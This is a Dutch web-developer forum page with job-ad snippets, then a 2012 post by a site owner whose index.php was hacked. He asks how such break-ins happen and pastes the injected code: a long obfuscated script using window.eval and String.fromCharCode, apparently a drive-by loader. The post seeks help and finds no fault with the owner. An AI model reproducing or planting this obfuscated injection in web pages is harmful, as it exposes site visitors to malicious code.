Gehacked, wat nu?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Front-end Developer

Onze klant is sinds 2 jaar actief als adviseur en bemiddelaar in de verzekeringsmarkt. Sindsdien proberen zij deze slapende markt flink wakker te schudden. Dit willen zij doen door het bouwen van slimme vergelijkers op hun eigen website en die van partners. Het bedrijf wil continu voorop lopen, zodat consumenten eenvoudig de verzekeringen kunnen vinden die het beste bij ze past. Functieomschrijving Als Front-end Developer werk je aan vergelijkingsmodules die consumenten dagelijks gebruiken bij het vergelijken en afsluiten van verzekeringen. Je vindt het leuk om samen te werken met de product owner, bestaande modules te verbeteren en nieuwe vergelijkers "from

Bekijk vacature »

Junior .NET developer

Functie Wij hebben drie scrumteams. Het eerste team focust zich op het stukje hardware wat wij in huis doen. Zij maken als team o.a. gebruik van C++. De andere twee scrumteams zijn allebei bezig met data verwerking en maken hierbij in de backend gebruik van C# .NET / .NET Core. Het verschil tussen deze teams is dat één team de data verwerking doet voor de mobiele applicatie. Zij werken hierbij dus ook met Xamarin. Het andere team focust zich op de webapplicaties en maakt hierbij ook gebruik van ASP.NET MVC. Op basis van jouw ambities en kwaliteiten kijken wij samen

Bekijk vacature »

.Net developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als .Net Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling. Mede hierdoor zij wij dit jaar Microsoft Partner of the year geworden. Sogetisten staan klaar voor elkaar, hebben lol met elkaar en daarmee behalen we de mooiste resultaten! Werken bij Sogeti

Bekijk vacature »

.Net Front-end Ontwikkelaar

Wij zoeken een .Net Front-end Ontwikkelaar! Omschrijving Kun jij snel schakelen en ben je stressbestendig? Dan zoeken wij jou! Als .Net Front-end Ontwikkelaar help je mee aan de webapplicatie die over de hele wereld door allerlei bedrijven wordt gebruikt. Je werkt daarnaast mee aan nieuwe en verbeterde functionaliteiten en helpt met het oplossen van bugs. Over de opdrachtgever Je komt te werken in een ambitieus team dat zich blijft ontwikkelen. Dit is alle informatie die we nu kunnen delen over de werkplek. Als jij de .Net Front-end Ontwikkelaar bent voor deze job, vertellen we je snel nóg meer. Eisen Heb

Bekijk vacature »

Java developer Zorgsysteem

Dit ga je doen Werken aan het eigen gebouwde zorgsysteem; Verbeteringen maken en toepassen binnen de applicatie; Jij gaat werken aan de Back-end van de applicatie en sporadisch werk je mee aan de Front-end; Samenwerken met andere teams voor een optimaal resultaat; Jij kan 'clean' werken en high quality code schrijven; Jij werkt resultaatgericht. Hier ga je werken De organisatie houdt zich bezig met diverse applicaties met betrekking tot zorgregistratie. Dankzij hun systeem komt alle informatie, omtrent de zorg van een patiënt, op een overzichtelijke en toegankelijke manier samen in één systeem te staan. Op deze manier is deze informatie

Bekijk vacature »

Ambitieuze medior developer

Wat je gaat doen: Heb jij al een paar jaar ervaring als developer maar wil jij naar the next level? In ons NextLevelDev Programma helpen wij jou om de volgende stap te zetten: een mooi programma aan trainingen op het gebied van Java, hippe frameworks, Agile/Scrum, OCP-certificering en optioneel: andere JVM-talen als Kotlin en Scala; Cloud (AWS, Azure, GCP) Soc Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun

Bekijk vacature »

Medior front-end developer gezocht (€3.300 -

Functie Wat ga je doen? Jij als front-end developer gaat werken binnen de teams van/voor onze klant. Je werkt in een team met starters en ervaren ontwikkelaars met allemaal 1 overeenkomst; passie voor het vak. Maak je een fout? Geen probleem, leer ervan en ga dan weer door. Door de variëteit aan werk kun je in verschillende omgevingen een kijkje nemen en jezelf dus snel ontwikkelen. Wat hebben we jou te bieden? • Uitdagende projecten bij mooie klanten (bij jou in de buurt, of binnenkort intern vanuit ons kantoor!) • Een jonge organisatie met talentvolle collega’s • Veel ruimte voor

Bekijk vacature »

PHP ontwikkelaar

Functie Jij komt te werken in een development team van 9 man. Het grootste deel doet back end development en daarnaast is er 1 teamlead en 1 tester in het team. Dit Agile team is van groots belang voor de organisatie omdat zij voornamelijk alle eigen systemen in-house ontwikkelen. Naast het door ontwikkelen van het bestaande platform en de software die daarbij komt kijken, zul jij je ook bezighouden met het realiseren en opzetten van nieuwe projecten binnen het bedrijf. Je staat nauw met de klant in contact om zo hun wensen zo goed mogelijk te kunnen realiseren. Daarnaast ontwikkel

Bekijk vacature »

Junior PHP (Laravel) Developer

Functie omschrijving Wij zijn op zoek naar een PHP Laravel Developer! Sta je aan het begin van je carrière en ben je op zoek naar een leuke baan? Lees dan verder! Voor een softwarebedrijf in omgeving van Schiphol zijn wij op zoek naar een ervaren PHP (Laravel) Developer. Je gaat je bezighouden met het ontwikkelen van innovatieve bedrijfsapplicaties. Samen met het team, bestaande uit designers en developers, maak je mooie oplossingen voor bedrijven in diverse branches. Je zorgt dat de opgeleverde websites perfect werken en de klant meer dan tevreden is. Je kunt rekenen op een afwisselende baan met leuke

Bekijk vacature »

Software Programmeur PHP - JAVA

Functie Voor een opdrachtgever in omgeving Zoetermeer zijn wij op zoek naar een ontwikkelaar ter versterking van het huidige developers team. Heb jij altijd al willen werken voor een bedrijf, dat veilige netwerkverbindingen levert, door middel van veilige oplossingen, die door middel van de nieuwste technologieën ontwikkelt zijn? Stop dan nu met zoeken! Hoe kan jouw dag er straks uitzien? Je gaat software en webapplicaties ontwikkelen met behulp van de talen C / C++ / PHP. Je gaat technische klussen uitvoeren op locatie bij klanten. Je onderhoudt contact met de projectleider om er zeker van te zijn dat een projecten

Bekijk vacature »

Mendix Ontwikkelaar - Vernieuwen van het applicati

Bedrijfsomschrijving De ontwikkelingen in de transportsector gaan razendsnel. Bij ons kun je een belangrijke rol spelen in deze sector. We streven ernaar om onze klanten te ontzorgen op het gebied van continuïteit en veiligheid met innovatieve producten en diensten. We willen dat onze klanten de veiligste vervoerders van Europa worden. Ons team werkt hard om deze ambitieuze doelstellingen te bereiken en we bieden een motiverende werkomgeving aan. We zijn op zoek naar zelfstarters met een focus op resultaat en beslissingsbevoegdheid. Functieomschrijving Als Mendix ontwikkelaar bij deze organisatie heb je een gevarieerde baan. Het applicatielandschap wordt vernieuwd en de “schade en

Bekijk vacature »

Senior Full Stack developer

Bedrijfsomschrijving tbd Functieomschrijving Full Stack Java Development bij Randstad Groep Nederland (HQ) Er is een vacature in het Corporate Client Solutions (CCS) team. Dit team is met een ander team net begonnen aan het project ‘Grip op Inhuur’. Het doel van dit project is de tevredenheid van onze leveranciers te verhogen en de efficiëntie van onze administratie te verbeteren. Onderdeel daarvan is een ‘Mijn-omgeving’ voor ZZP’ers en leveranciers. Naast dit nieuwe project werkt het team ook aan het onderhoud en verbeteren van een digitaal vacature management systeem waarmee dagelijks vele vacatures worden voorzien. Het team ontwikkelt zo veel mogelijk zelf

Bekijk vacature »

BizTalk/ Azure Developer

Dit ga je doen •Understanding the scope of required functionality, translate them within context of way of working of the team into developed solutions, whilst safeguarding documentation; •Planning based on assigned sprint tasks; •Acting as an expert in estimation techniques and planning; •Understanding your role in the agile process and act in this way; •Facilitating internal communication and effective collaboration; •Working closely with scrum master to handle backlogs and new requests; •Providing information to the third parties about activities and needs for compliance. Hier ga je werken Our client is a leading organization focusing on animal nutrition, offering solutions that

Bekijk vacature »

Embedded Software Developer

Functie omschrijving Ben jij een Embedded Software Developer die affiniteit heeft met de allernieuwste technieken? Voor een mooi softwarebedrijf in omgeving Gouda zijn wij op zoek naar een Embedded Software developer. Binnen deze rol houdt jij je bezig met alle werkzaamheden die nodig zijn om een functionaliteit te bouwen. Denk aan ontwerpen, architectuur, programmeren en algoritmes. Je voert test en validatie werkzaamheden uit bij de implementatie bij de klant. Ben jij enthousiast en een echte team player? Lees dan snel verder en laat wat van je horen! Bedrijfsprofiel Onze opdrachtgever bestaat uit een groot aantal creatieve en ambitieuze ontwikkelaars. Ze

Bekijk vacature »

Ontwikkelaar Centrale Monitoring

Ontwikkelaar centrale Monitoring Functieomschrijving Wil jij een bijdrage leveren aan het onderhoud, opzetten en ontwikkelingen van technologieën van SSC-ICT, een van de grootste ICT-dienstverleners van en voor de Rijksoverheid? Je komt als monitorspecialist te werken bij team Operations Management Services. Dit team werkt aan het stabiliseren en waarborgen van een betrouwbare monitoromgeving voor 7 ministeries. Jij begeleidt het implementatieproces van de te monitoren technologieën, onder andere via management packs, connectoren en API's. Je hebt hiervoor veel contact met interne en externe klanten, die hun wensen op het gebied van monitoring aan jou doorgeven. Je beoordeelt deze wensen en komt met

Bekijk vacature »
John Cena

John Cena

09/07/2012 09:30:39
Quote Anchor link
Zo,

Men dempt de put als...

Maar, ik weet niet in welke put het fout ging.

De index.php is aangepast en er is een bepaalde code bij ingezet. Hoe wordt dit algemeen gedaan? FTP kraak?

De meest awkward looking code:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,42,53,59,125,99,97,116,99,104,40,122,41,123,102,114,61,34,102,114,111,109,67,104,97,114,34,59,102,61,91,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,50,52,44,53,50,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,50,51,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,56,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,54,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,52,56,44,53,53,53,44,49,57,50,44,50,50,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,57,50,44,49,54,48,44,50,53,50,44,49,54,48,44,54,50,52,44,53,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,51,55,50,44,49,54,48,44,50,56,56,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,49,54,48,44,54,48,54,44,53,52,48,44,54,57,48,44,53,48,53,44,49,57,50,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,50,53,56,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,50,48,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,50,48,53,44,51,53,52,44,53,48,44,55,53,48,44,53,48,44,54,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,53,48,44,54,48,54,44,53,57,53,44,49,57,50,44,51,52,48,44,53,56,50,44,53,56,48,44,54,48,54,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,53,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,50,51,48,44,54,49,56,44,53,48,53,44,54,57,54,44,51,54,48,44,54,54,54,44,53,56,53,44,54,56,52,44,53,55,53,44,50,52,48,44,50,48,53,44,49,57,50,44,51,49,48,44,49,57,50,44,50,52,53,44,51,48,48,44,49,54,48,44,51,55,56,44,49,54,48,44,50,57,52,44,49,54,48,44,51,52,56,44,49,54,48,44,50,56,56,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,50,53,48,44,51,48,54,44,50,54,48,44,51,49,56,44,50,55,48,44,51,51,48,44,50,56,48,44,51,52,50,44,50,52,48,44,50,57,52,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,54,50,44,53,53,53,44,54,54,48,44,53,56,48,44,54,50,52,44,50,48,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,50,52,54,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,48,44,49,57,50,44,50,52,48,44,55,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,53,56,44,49,54,48,44,50,52,48,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,54,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,51,49,50,44,50,56,48,44,51,48,48,44,50,55,53,44,50,57,52,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,51,48,48,44,50,52,53,44,51,49,50,44,50,55,53,44,51,49,50,44,50,56,48,44,51,48,54,44,50,55,48,44,51,49,50,44,50,55,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,49,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,50,57,52,44,50,51,48,44,50,56,56,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,48,44,54,48,54,44,54,48,48,44,54,57,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,51,57,48,44,55,48,50,44,53,52,53,44,53,56,56,44,53,48,53,44,54,56,52,44,50,48,48,44,54,56,52,44,50,50,48,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,54,52,44,49,54,48,44,52,54,50,44,52,56,53,44,55,50,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,50,52,48,44,51,56,53,44,53,56,50,44,54,48,48,44,50,55,48,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,54,56,52,44,50,51,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,53,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,50,54,52,44,49,54,48,44,55,51,50,44,53,53,53,44,54,54,48,44,53,48,53,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,56,48,44,54,57,54,44,53,48,53,44,54,56,52,44,53,55,53,44,49,57,50,44,51,48,53,44,49,57,50,44,52,53,53,44,50,51,52,44,52,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,49,48,44,50,51,52,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,53,56,48,44,54,56,52,44,49,54,48,44,51,54,54,44,49,54,48,44,50,51,52,44,49,57,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,49,50,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,51,48,44,49,54,48,44,51,54,54,44,49,54,48,44,50,56,56,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,51,48,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,53,48,44,54,49,56,44,53,56,48,44,54,50,52,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,50,49,53,44,50,53,56,44,49,54,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,51,54,54,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,52,53,53,44,53,57,52,44,53,55,48,44,54,48,54,44,52,56,53,44,54,57,54,44,53,48,53,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,50,50,48,44,49,57,50,44,50,52,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,50,51,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,49,57,50,44,50,50,53,44,49,57,50,44,50,52,53,44,50,52,54,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,49,57,50,44,49,57,53,44,50,55,54,44,49,57,53,44,49,57,50,44,50,49,53,44,49,57,50,44,54,49,48,44,54,54,54,44,53,53,48,44,54,48,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,57,48,44,53,48,53,44,54,57,54,44,52,50,48,44,54,51,48,44,53,52,53,44,54,48,54,44,53,53,53,44,55,48,50,44,53,56,48,44,50,52,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,50,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,56,52,44,54,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,55,50,54,44,53,54,48,44,54,48,54,44,53,53,53,44,54,49,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,51,54,54,44,49,54,48,44,50,48,52,44,53,56,53,44,54,54,48,44,53,48,48,44,54,48,54,44,53,49,48,44,54,51,48,44,